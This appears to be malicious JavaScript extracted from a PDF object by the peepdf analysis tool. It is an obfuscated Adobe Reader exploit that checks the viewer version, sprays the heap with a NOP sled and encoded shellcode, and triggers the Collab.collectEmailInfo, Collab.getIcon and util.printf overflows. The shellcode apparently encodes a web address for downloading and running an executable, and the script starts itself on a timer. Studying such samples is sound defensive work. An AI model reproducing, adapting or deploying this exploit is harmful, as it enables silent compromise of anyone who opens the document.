// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u434', '3%u4343%', 'u4343', '%u0FEB%u', '335B%', 'u66C9%u8', '0B9%u80', '01%uEF3', '3%uE243%', 'uEBFA%', 'uE805', '%uFFEC%', 'uFFFF%', 'u8B7F%u', 'DF4E%uEF', 'EF%u64', 'EF%uE', '3AF%u9F6', '4%u42F3%', 'u9F64%u', '6EE7%u', 'EF03%uEF', 'EB%u64EF', '%uB903', '%u6187', '%uE1A1%u', '0703%uEF', '11%uEFEF', '%uAA6', '6%uB9E', 'B%u778', '7%u6511%', 'u07E1%uE', 'F1F%u', 'EFEF%uA', 'A66%u', 'B9E7%u', 'CA87%', 'u105F%u0', '72D%uEF', '0D%uEFEF', '%uAA6', '6%uB9E3%', 'u0087%u', '0F21%u0', '78F%uEF', '3B%uEFEF', '%uAA6', '6%uB9F', 'F%u2E87', '%u0A96%', 'u0757%', 'uEF29%uE', 'FEF%uAA', '66%uAFFB', '%uD76F%', 'u9A2C%u6', '615%uF7', 'AA%uE806', '%uEFEE%', 'uB1EF%u9', 'A66%u64C', 'B%uEBA', 'A%uEE8', '5%u64B6', '%uF7BA', '%u07B9', '%uEF64', '%uEFEF%u', '87BF%', 'uF5D9%', 'u9FC0%u7', '807%uEF', 'EF%u66', 'EF%uF3A', 'A%u2A', '64%u2F6C', '%u66BF%u', 'CFAA%u10', '87%uEF', 'EF%uBFEF', '%uAA6', '4%u85FB', '%uB6E', 'D%uBA', '64%u07F', '7%uEF8', 'E%uEFEF', '%uAAEC%u', '28CF%u', 'B3EF%', 'uC191%u', '288A%uE', 'BAF%u8A', '97%uE', 'FEF%u', '9A10%', 'u64CF%u', 'E3AA%u', 'EE85%u', '64B6%uF7', 'BA%uAF', '07%uE', 'FEF%u8', '5EF%u', 'B7E8%u', 'AAEC%', 'uDCCB%u', 'BC34%', 'u10BC', '%uCF9', 'A%uBC', 'BF%uA', 'A64%u', '85F3%uB', '6EA%uBA', '64%u07F', '7%uEFC', 'C%uEF', 'EF%uEF85', '%u9A10%u', '64CF%uE7', 'AA%uED85', '%u64B', '6%uF7BA%', 'uFF07%', 'uEFEF%', 'u85EF%', 'u6410%uF', 'FAA%uE', 'E85%u64', 'B6%uF', '7BA%uEF0', '7%uEFE', 'F%uAEEF', '%uBDB4', '%u0EE', 'C%u0EEC', '%u0EE', 'C%u0EEC', '%u036C%u', 'B5EB%u64', 'BC%u0D', '35%uBD1', '8%u0F10%', 'u64BA%', 'u6403%u', 'E792%', 'uB264%', 'uB9E3%u9', 'C64%u64D', '3%uF19B', '%uEC97', '%uB91C%u', '9964%uE', 'CCF%uDC', '1C%uA626', '%u42A', 'E%u2C', 'EC%uD', 'CB9%uE01', '9%uFF51', '%u1DD5', '%uE79B%u', '212E%uEC', 'E2%uAF1D', '%u1E04%u', '11D4%u9A', 'B1%uB5', '0A%u0', '464%uB56', '4%uEC', 'CB%u8', '932%uE3', '64%u64A', '4%uF3B5%', 'u32EC%u', 'EB64%uEC', '64%uB12', 'A%u2DB2', '%uEFE7', '%u1B07', '%u1011%u', 'BA10%uA', '3BD%uA0A', '2%uEF', 'A1%u74', '68%u70', '74%u2F3', 'A%u632', 'F%u6D6', '1%u7261', '%u7265', '%u726F', '%u636', '1%u7065', '%u2E72%u', '6F63%u2', 'F6D%u65', '77%u61', '62%u696', 'C%u657A%', 'u2F72%u', '616C%u', '646E%u', '6E69%u', '2F67%', 'u7865%u', '2E65%', 'u6870', '%u3F7', '0%u3D', '78%u64', '70%u00', '66');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

